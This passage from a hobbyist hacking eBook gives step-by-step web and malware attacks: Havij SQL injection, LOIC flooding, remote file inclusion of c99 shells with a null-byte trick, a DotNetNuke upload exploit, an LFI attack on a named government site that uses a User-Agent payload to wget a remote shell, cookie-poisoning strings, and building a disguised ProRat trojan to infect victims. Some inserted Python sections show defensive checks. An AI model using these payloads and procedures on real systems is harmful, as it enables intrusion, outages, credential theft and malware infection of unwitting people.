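Running the report against a real page means fetching it with the probe in the query string and applying the same substring test to the response body; the hardened renderer still echoes the word "hi", which is why check 1 alone only indicates a chance of a problem and checks 2 and 3 are what confirm it.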

Performing SQL Attacks

A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. Therefore, below I am using an popular tool known as Havij to explain you this type of attack. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the


underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than of 95% at injecting vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. Features1. Supported Databases with injection methods:MsSQL 2000/2005 with error MsSQL 2000/2005 no error union based MsSQL Blind MySQL time based MySQL union based MySQL Blind MySQL error based MySQL time based Oracle union based Oracle error based PostgreSQL union based MsAccess union based MsAccess Blind Sybase (ASE) and Blind . 2. HTTPS Support 3. Proxy support 4. Automatic database detection 5. Automatic type detection (string or integer) 6. Automatic keyword detection (finding difference between the positive and negative response)


7. Trying different injection syntax’s 8. Options for replacing space by /**/,+,... against IDS or filters 9. Avoid using strings (magic_quotes similar filters bypass) 10. Manual injection syntax support 11. Manual queries with result 12. Bypassing illegal union 13. Full customizable http headers (like referrer,user agent and ...) 14. Load cookie from site for authentication 15. Http Basic and Digest authentication 16. Injecting URL rewrite pages 17. Bypassing mod_security web application firewall and similar firewalls 18. Real time result 19. Guessing tables and columns in mysql<5 (also in blind) and MsAccess 20. Fast getting tables and columns for mysql 21. Executing SQL query in Oracle database 22. Getting one row in one request (all in one request) 23. Dumping data into file 24. Saving data as XML format 25. View every injection request sent by program 26. Enabling xp_cmdshell and remote desktop 27. Multi thread Admin page finder and Online MD5 cracker 28. Getting DBMS Information’s 29. Getting tables, columns and data 30. Command execution (mssql only) 31. Reading system files (mysql only) 32. insert/update/delete data .

Below is a screenshot of Havij -


How to use it?

This tool is for exploiting SQL injection bugs in web applications. To use this tool you should know a little about SQL injection. Enter the target URL, select the HTTP method and then click Analyze. Note: make sure the URL is valid, i.e. an input that returns a normal page, not a 404 or error page.

Denial of Service Attack

Are you curious about how to flood a website with a DoS attack, as most hackers do for fun? If yes, then sit down and read this article. I am going to explain the proper definitions one by one and also tell you at the end how this attack is performed.

What is a Denial of Service Attack?


A denial of service attack (DoS) is an attack through which a person can render a system unusable, or significantly slow it down for legitimate users, by overloading its resources so that no one can access it. If an attacker is unable to gain access to a machine, the attacker will most probably just crash the machine to accomplish a denial of service; this is one of the most used methods for website hacking. There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes:

1. Bandwidth attacks
2. Protocol attacks
3. Logic attacks

What is a Distributed Denial of Service Attack?

In a DDoS attack, the attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies, to launch an attack against a target or network at the same time. This makes it difficult to detect, because the attacks originate from several IP addresses. If a single IP address is attacking a company, it can block that address at its firewall. If it is 30,000 addresses, this is extremely difficult.
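The firewall point above (one attacking address is easy to block, 30,000 are not) is exactly what separates a DoS from a DDoS in the logs. As an added example that is not part of the eBook, the Python below counts requests per source in a sliding window over constructed connection records and reports whether the flood is a single source that a firewall rule would stop, or a distributed one where no single address crosses the threshold. The thresholds and the two traffic samples are constructed for this example.

```python
"""Sliding-window request counting to tell a single-source flood from a distributed one."""
from collections import defaultdict

# Constructed thresholds for this example: what one client may send in WINDOW
# seconds before a per-address block is justified, and what the site as a whole
# can absorb in the same window.
WINDOW_SECONDS = 10.0
PER_ADDRESS_LIMIT = 100
TOTAL_LIMIT = 300


def analyse_window(events, window=WINDOW_SECONDS,
                   per_address_limit=PER_ADDRESS_LIMIT, total_limit=TOTAL_LIMIT):
    """Scan (timestamp, source_ip) records and classify the peak load.

    Returns a dict with the addresses that individually exceeded the limit
    (block these at the firewall), the peak number of requests seen in any
    window, how many distinct sources made up that peak, and a "distributed"
    flag set when the aggregate exceeded its limit while no single address did.
    """
    events = sorted(events)              # oldest first
    in_window = defaultdict(int)         # source_ip -> requests inside the window
    peak_per_address = defaultdict(int)
    peak_total = 0
    peak_sources = 0
    start = 0
    for end, (ts, ip) in enumerate(events):
        in_window[ip] += 1
        # drop records older than the window from the left edge
        while events[start][0] < ts - window:
            old_ip = events[start][1]
            in_window[old_ip] -= 1
            if in_window[old_ip] == 0:
                del in_window[old_ip]
            start += 1
        peak_per_address[ip] = max(peak_per_address[ip], in_window[ip])
        total = end - start + 1
        if total > peak_total:
            peak_total = total
            peak_sources = len(in_window)
    offenders = sorted(ip for ip, n in peak_per_address.items() if n > per_address_limit)
    return {
        "single_source": offenders,
        "peak_requests": peak_total,
        "peak_sources": peak_sources,
        "distributed": peak_total > total_limit and not offenders,
    }


def constructed_single_source_flood():
    """Constructed: one client (10.0.0.5) sends 150 requests in under 5 s; 20 others send one each."""
    events = [(i * 0.03, "10.0.0.5") for i in range(150)]
    events += [(i * 0.2, f"192.0.2.{i}") for i in range(1, 21)]
    return events


def constructed_distributed_flood():
    """Constructed: 60 sources send 8 requests each within 6 s: 480 in total, none above 100."""
    return [(j * 0.75 + i * 0.001, f"203.0.113.{i}")
            for i in range(1, 61) for j in range(8)]


if __name__ == "__main__":
    for name, sample in (("single source", constructed_single_source_flood()),
                         ("distributed", constructed_distributed_flood())):
        print(name, analyse_window(sample))
```

The second sample is the case the text describes: the aggregate is well over the limit, yet no per-address rule would ever fire.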

Damages made by denial of service attacks

Over the past years the denial of service attack has caused a huge amount of damage, and many have been victims of this attack. It's real: on February 6th, 2000, the Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off. This attack also hit Twitter more recently, on 6th August 2009; a lot of people had trouble logging on to Twitter. It was brought down by a denial of service attack that tied up their servers so no one could log on. Websites like Facebook, eBay etc. have also been victims of this attack.

Now I will show you how you can flood a website with a denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools, called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org. This program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, MySpace, Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon) from here, then open up LOIC.

Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Done!

Remote File Inclusion

RFI is one of the popular web hacking methods used by hackers in today's world. Remote file inclusion occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server-side commands as the currently logged on user and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system. Many servers are vulnerable to this kind of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0 register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let's go through the steps a hacker would take to exploit this type of vulnerability in a website.

1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google's provided search tools to help get a specific search result.
2. Websites that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName
3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like the following: http://target-site.com/index.php?page=http://google.com
4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like: http://target-site.com/index.php?page=http://site.com/c99.txt?
6. Sometimes the PHP script on the server appends ".php" to the end of every included file. So if you included the shell, it would end up looking like "c99.txt.php" and not work. To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt.
7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFI. An example of a Google dork would be: allinurl:.php?page=. This looks for URLs with .php?page= in them. This is only an example and you most likely won't find any vulnerable sites with that search. You can try switching around the word "page" with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.
8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:


The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell, but this time as a .php file, so that in case the vulnerability is fixed he will be able to access it later on.
9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain usernames and passwords for the MySQL databases and such.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled. Enjoy Hacking :D

Cookie Poisoning

Well, for starters I can begin by saying that cookie poisoning is a lot like SQL injection. Both use 'OR'1'='1 or maybe '1'='1'. But in cookie poisoning you begin by alerting your cookies:

Javascript:alert(document.cookie)

Then you will perhaps see "username=JohnDoe" and "password=iloveJaneDoe". In this case the cookie poisoning could be:

Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");

There are also many versions of this kind, like for example ' '1'='1' or 'OR'1'='1 or 'OR'1'='1'OR' and so on. For more details, refer to my website www.krackoworld.com

DotNetNuke

Actually DotNetNuke is an open source web content management system based on Microsoft .NET technology which allows us to upload anything to the web server of your victim's domain. Please perform this attack in Google Chrome, Mozilla Firefox or Opera only. Below is the procedure for performing it by simply using the Google search engine.

Procedure

1. Open www.google.com
2. Then search this dork to find vulnerable sites using Google (you can also find them yourself by other methods): inurl:/tabid/36/language/en-US/Default.aspx
3. Now you will find many websites in the Google search as given below-

4. Choose one of the sites above and open it in the browser.
5. For example, you choose http://www.xyz.com/Home/tabid/36/Language/en-US/Default.aspx where xyz is the domain name.
6. Now replace /Home/tabid/36/Language/en-US/Default.aspx with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
7. and hit enter.
8. Hence, you will see this screen in the browser-

9. Choose the 3rd option above and then, at the address bar, type this JavaScript: javascript:__doPostBack('ctlURL$cmdUpload','')
10. Done! Now you have the upload option coming up at the site like this-

11. Now you can upload any type of file you want, for example txt, swf, jpg, gif, pdf files etc.
12. After uploading files, your file is saved in the root folder and its address will be something like http://www.xyz.com/portals/0/krackoworld.txt, with full access.
13. Chapter closed here.

Tip - You can also use a Google dork such as inurl:"/portals/0" to find more vulnerable sites as above.

Local File Inclusion

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected. A typical example of a PHP script vulnerable to LFI is as follows:


<?php
$file = $_GET['file'];        // attacker-controlled value, used without any validation
if(isset($file)) {
    include("pages/$file");   // traversal sequences in $file escape the pages/ folder
} else {
    include("index.php");
}
?>

Requirements

A few things you need to start:
1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt )
3) User-Agent Switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

Procedure

First of all, see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it). Try to open etc/passwd. Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
OK fine... we can open etc/passwd. Now type proc/self/environ. Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent Switcher. Go to Tools > Default User-Agent > Edit User Agents. You will get this window.

Now make a new user-agent by going to New > New User-Agent. You will get something like this:

<?php phpinfo();?>


Now leave everything as it is except the description and user-agent. In the description enter a name for it (mine is phpinfo). In User-Agent, paste the code above. Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your user agent is called). Go to your site and refresh it. You should get something like this on your site.

Now search for "disable_functions" (Ctrl+F search function). Mine is:
disable_functions | no value | no value
That is good. We can spawn our shell now! Now go back and edit your User-Agent. Change "User-Agent" to:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
(What does this do? It downloads the shell in .txt format and saves it as shell.php.) Save it and refresh your site. Go to http://www.LFISITE.com/shell.php (mine is http://www.bislig.gov.ph/shell.php ). Voila, we have our shell up. Done!
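The fix for the include() pattern shown at the start of this section, and for the RFI payloads described two sections earlier, is to never hand a request parameter to the file system unchecked. The following is an added Python example, not code from the eBook, that mirrors the vulnerable PHP logic with a hardened resolver: an allowlist of page names plus a containment check on the resolved path, and a classifier that labels the page's own payloads the way a log review would. The pages directory, the allowlist and the sample parameters are constructed for this example.

```python
"""Hardened page resolver: the safe counterpart of the vulnerable include() above."""
import os
from urllib.parse import unquote

# Constructed for this example: the directory the PHP snippet called "pages/"
# and the only page names the application is allowed to include.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}
DEFAULT_PAGE = "index.php"


class IncludeRejected(ValueError):
    """Raised when a request parameter must not reach include()."""


def classify_page_param(param):
    """Label a raw ?page= / ?file= value the way a log review or WAF rule would.

    Returns one of: "default", "ok", "null-byte", "remote-include",
    "traversal", "unknown-page".  Checks run in order of severity so the
    most telling indicator wins.
    """
    if param is None or param == "":
        return "default"
    value = unquote(param)            # %00 and ../ arrive URL-encoded in the request
    if "\x00" in value:
        return "null-byte"            # the c99.txt%00 trick to drop an appended ".php"
    lowered = value.lower()
    if "://" in lowered or lowered.startswith("//"):
        return "remote-include"       # ?page=http://site.com/c99.txt?
    if ".." in value or "/" in value or "\\" in value:
        return "traversal"            # ../../../../etc/passwd, /proc/self/environ
    if value not in ALLOWED_PAGES:
        return "unknown-page"         # not in the allowlist: refuse rather than guess
    return "ok"


def resolve_page(param, pages_dir=PAGES_DIR):
    """Return the absolute path that may be included, or raise IncludeRejected.

    Defense in depth: even an allowlisted name is joined to pages_dir and the
    resolved path is checked to still sit inside pages_dir, so a symlink or a
    future change to the allowlist cannot reach outside it.
    """
    label = classify_page_param(param)
    base = os.path.realpath(pages_dir)
    if label == "default":
        return os.path.join(base, DEFAULT_PAGE)
    if label != "ok":
        raise IncludeRejected(label)
    target = os.path.realpath(os.path.join(base, unquote(param) + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("escaped-pages-dir")
    return target


# Constructed sample requests: the payloads discussed in the RFI and LFI
# sections next to a legitimate one and an unknown page name.
SAMPLE_PARAMS = [
    "home",
    "http://google.com",
    "http://site.com/c99.txt?",
    "c99.txt%00",
    "../../../../../../etc/passwd",
    "../../../../../../proc/self/environ",
    "admin",
]


def audit(params=SAMPLE_PARAMS):
    """Map each parameter to its label; handy for checking a log extract."""
    return {p: classify_page_param(p) for p in params}


if __name__ == "__main__":
    for p, label in audit().items():
        print(f"{label:16} {p}")
    print("resolved:", resolve_page("home"))
```

The same checks make the php.ini advice in the RFI section (disable allow_url_fopen and register_globals) a second layer rather than the only one.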


Session Hijacking

This is not much related to web hacking but plays an important role in account (username and password) hacking by cookie stealing techniques. Session hijacking is the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine. A popular method is using source-routed IP packets. This allows a hacker at point A on the network to participate in a conversation between B and C by encouraging the IP packets to pass through its machine. If source routing is turned off, the hacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the hacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. A hacker can also be "inline" between B and C using a sniffing program to watch the conversation. This is known as a "man-in-the-middle attack". A common component of such an attack is to execute a denial-of-service (DoS) attack against one end-point to stop it from responding. This attack can be either against the machine to force it to crash, or against the network connection to force heavy packet loss.

Methods

There are four main methods used to perpetrate a session hijack. These are:


• Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
• Session side jacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
• Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
• Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

Prevention

Methods to prevent session hijacking include:
• An open source solution is ArpON ("ARP handler inspection"). It is a portable handler daemon that makes ARP secure in order to avoid Man In The Middle (MITM) attacks through ARP spoofing/poisoning. It also detects and blocks the derived attacks used in more complex attacks, such as DHCP spoofing, DNS spoofing, web spoofing, session hijacking and SSL/TLS hijacking.
• Use of a long random number or string as the session key. This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks.
• Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after he has logged in.
• Encryption of the data passed between the parties; in particular the session key. This technique is widely relied upon by web-based banks and other e-commerce services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack.
• Some services make secondary checks against the identity of the user. For example, a web server could check with each request made that the IP address of the user matched the one last used during that session. This does not prevent attacks by somebody who shares the same IP address, however, and could be frustrating for users whose IP address is liable to change during a browsing session.
• Alternatively, some services will change the value of the cookie with each and every request. This dramatically reduces the window in which an attacker can operate and makes it easy to identify whether an attack has taken place, but can cause other technical problems (for example, preventing the back button from working properly on the web).
• Users may also wish to log out of websites whenever they are finished using them.
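The second and third prevention items above (a long random session key, and regenerating the id at login) are the ones developers most often get wrong, so here is an added Python example, not from the eBook, of a minimal server-side session store that applies them, together with the cookie attributes that address the side jacking and cross-site scripting methods listed earlier. The store, the injectable clock and the scenario it replays are constructed for this example.

```python
"""Minimal session store that resists fixation, guessing and idle reuse."""
import secrets
import time

SESSION_ID_BYTES = 32          # 256 bits of entropy: not guessable by brute force
IDLE_TIMEOUT_SECONDS = 15 * 60


class SessionStore:
    """Server-side sessions keyed by ids the server itself generated."""

    def __init__(self, clock=time.time, idle_timeout=IDLE_TIMEOUT_SECONDS):
        self._sessions = {}        # sid -> {"user": ..., "last_seen": ...}
        self._clock = clock        # injectable so expiry can be simulated
        self._idle_timeout = idle_timeout

    def new_session(self):
        """Issue a fresh anonymous session id (what a first visit gets)."""
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def get(self, sid):
        """Return the session for sid, or None if unknown or idle too long.

        A client-presented id that the server never issued is simply ignored;
        adopting it is what makes fixation possible in the first place.
        """
        session = self._sessions.get(sid)
        if session is None:
            return None
        if self._clock() - session["last_seen"] > self._idle_timeout:
            del self._sessions[sid]
            return None
        session["last_seen"] = self._clock()
        return session

    def login(self, sid, user):
        """Authenticate and rotate: the pre-login id is destroyed, a new one issued."""
        old = self.get(sid)
        if old is not None:
            del self._sessions[sid]      # an attacker-known id dies here
        fresh = self.new_session()
        self._sessions[fresh]["user"] = user
        return fresh

    def logout(self, sid):
        self._sessions.pop(sid, None)

    def user_for(self, sid):
        session = self.get(sid)
        return None if session is None else session["user"]


def session_cookie_header(sid):
    """Set-Cookie attributes for the session id.

    Secure: never sent over plain HTTP, so side jacking on open Wi-Fi sees nothing.
    HttpOnly: not readable by script, so a cross-site scripting bug cannot copy it.
    SameSite=Lax: not attached to cross-site requests that could ride on the session.
    """
    return f"Set-Cookie: sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def replay_fixation_attempt(store=None):
    """Replay the fixation method from the list above against this store.

    Returns (attacker_sid, victim_sid, user_seen_by_attacker).
    """
    store = store or SessionStore()
    attacker_sid = store.new_session()          # attacker obtains a valid id
    # ...and gets the victim to use it (the email-link step).  The victim logs in:
    victim_sid = store.login(attacker_sid, "alice")
    # The attacker now presents the id he planted:
    return attacker_sid, victim_sid, store.user_for(attacker_sid)


if __name__ == "__main__":
    a, v, seen = replay_fixation_attempt()
    print("ids differ:", a != v, "| attacker sees user:", seen)
    print(session_cookie_header(v))
```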

Firesheep

Recently a Firefox extension called Firesheep has made it easy for public Wi-Fi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the Firesheep user to easily access private information from cookies and threaten the public Wi-Fi users' personal property. Below is a video link given by Rahul Tyagi (an ethical hacker) to demonstrate session hijacking properly: http://www.slideshare.net/amansyal/session-hijacking-by-rahul-tyagi

Countermeasures

A few defensive measures against web hacking:
* If you utilize a web content management system, subscribe to the development blog. Update to new versions as soon as possible.
* Update all 3rd party modules as a matter of course; any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'books.php' or something, instead of "AdminLogin.php" etc.?
* Enter some confusing data into your login fields, like the sample injection strings shown above, and anything else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray a vulnerability.
* Do a few Google hacks on your name and your website. Just in case...
* That's it! Good luck for your future in website building.

Chapter Nine - Malware

Malware, short for malicious software, consists of programming (code, scripts, active content, and other software) designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior. Software is considered to be malware based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, Trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software or programs.


Types of Malware

1. Trojan Horse
A Trojan virus or Trojan horse is one of the most common types of malware. A Trojan is mostly used to control the victim's computer rather than infecting or destroying files on it. A Trojan horse, once installed on the victim's computer, can give a hacker complete access to that computer. Trojans are one of the most dangerous forms of malware.

2. Computer Viruses
A computer virus is a malicious program which is mostly developed to infect a computer; once it infects a computer it replicates or reproduces itself. A virus is just like a parasite: it needs another host to attach to in order to infect a computer.

3. Worms
Worms are almost similar to computer viruses; the only difference is that, unlike computer viruses, they do not require another host to attach to in order to infect a computer. Once a worm infects a computer it replicates itself. Computer worms are major threats to large networks.

4. Keyloggers
A keylogger is a hardware or software device which monitors every keystroke typed on the computer, as well as screenshots, chats etc. A keylogger program does not require physical access to the user's computer. Any person with a basic knowledge of computers can use a keylogger.

5. Adware
Adware is the short form of advertisement-supported software. Adware is commonly designed to display advertisements on your computer. However, some adware may contain harmful viruses and spying programs which can bring your computer system to its knees.


6. RATs
RAT is short for "Remote Administration Tool" and is indeed one of the most dangerous types of malware. It's very similar to a Trojan. Once a RAT is installed on a computer the attacker can do almost anything on the remote computer, such as installing a keylogger, shutting down the computer, infecting files etc.

7. Bacteria
Bacteria make many copies of themselves and eventually end up taking up all of the computer's resources, such as all of its processor power, memory and disk space. This results in the legitimate user losing access to those resources.

8. Threat Bombs
Logic bombs are usually pieces of code that are programmed into a program and lie dormant until a certain time, or until a user does a certain action, which causes them to be executed.

ProRat

ProRat is a Remote Administration Tool (RAT). ProRat opens a port on the infected computer which allows the client to perform various operations on the infected computer. Once ProRat is installed on a computer it's very difficult to remove without an updated antivirus program. Below I will show the procedure which a hacker would take to take control of a victim's computer using ProRat.

1. First of all download ProRat. The password of the zip file will be "Pro".
2. Disable your antivirus before using ProRat, and once you have downloaded it launch the program. You will see the following screen below:-


3. Click on the Create button at the bottom to create the Trojan file and choose Create ProRat Server.
4. Put your IP address in the IP (DNS) Address box so the server can connect to you.
5. Now open Notifications at the sidebar and select the second option, "Mail Notifications". Here you will see an email address "bomberman@yahoo.com"; change this to the email address where you want to receive notifications when the server is installed on your victim's computer.
6. Now click on the General Settings option. Enter the server port you would like to connect through. Enter the server password; you will be asked for the server password when the victim gets infected and you would like to connect to them. Then choose the victim name. You can also tick the "Give a fake error" message option: when the victim opens the server he will get a fake error message which you configure, making the victim think that the file is damaged or corrupted.
7. Click on Bind with file on the sidebar. You can bind it with a text document or any other file to increase the chances of the victim clicking it.
8. Now click on the Server extensions option. Here you can change the desired extension. I will use EXE because it has icon support, or you can also use SCR, which has icon support too.
9. Now click on Server icon and choose the desired icon you would like to display for the server, and click on Create server. Now you have successfully created a server.

The hacker could rename it something like "Funny joke" and send it via email attachment, or alternatively the hacker could upload it to a web hosting site and just ask the victim to manually download it. Once the victim runs the server on his/her computer he will get the error message which I configured in the general settings tab. The server gets installed silently in the computer background and the hacker will be sent a notification to the email address he specified in the notification tab whenever the victim is infected.

Countermeasures

There are a couple of things you can do to prevent yourself from being infected by the malware discussed in this post.
1. Make sure you have good and up-to-date anti-virus software installed on your computer. Also, if there is an automatic update option in your anti-virus software, make sure it is enabled.
2. Make sure you have a firewall installed on your computer and make sure that it is actually enabled. Firewalls protect against unauthorized inbound and outbound connections.

Thanks!

Chapter Ten - Conclusion


Congratulations, you have done it! From now on you will be considered an ethical hacker and computer security expert like me. But don't think this is enough; develop a habit of learning and learning, because every new thing will teach you a new lesson in your life. According to me, exploring is the true power of hacking.

Tell Others about my eBook!

A special request from me to my dear friends and colleagues: please tell others about it, by contacting them directly or by posting links to buy it on your website, blog, Facebook and Twitter. Note: don't redistribute it, just ask them to purchase it from my website.

My Blog/Website

www.Krackoworld.com is my hacking/security blog. It was launched in 2010 with the aim of making people aware of hacking and how to safeguard yourself from it. Please subscribe to my blog RSS to get cool tutorials and the latest news about hacking. Please note: some of the articles from my blog have been included in this eBook.

Suggestions

I would love to hear any type of suggestions from you about my newly published eBook. Just tell me via email: krackoworld@gmail.com


Keep us strong

Respected readers: as an 18-year-old student, running the topmost blog in today's world is something quite difficult to do or handle, as we bring the best things available related to ethical hacking and security tips to our readers every day. To keep us strong with this attitude, a small contribution from your side will be highly appreciated. Please donate to my PayPal address: karan.chauhan75@gmail.com

Any doubts are welcome here

Please contact me at my email, krackoworld@gmail.com, for any kind of help or doubts at any time. I will respond as soon as possible. You can also join our forums.

Thanks

Find us on Facebook - Twitter

Warm Regards
Karan Singh Chauhan

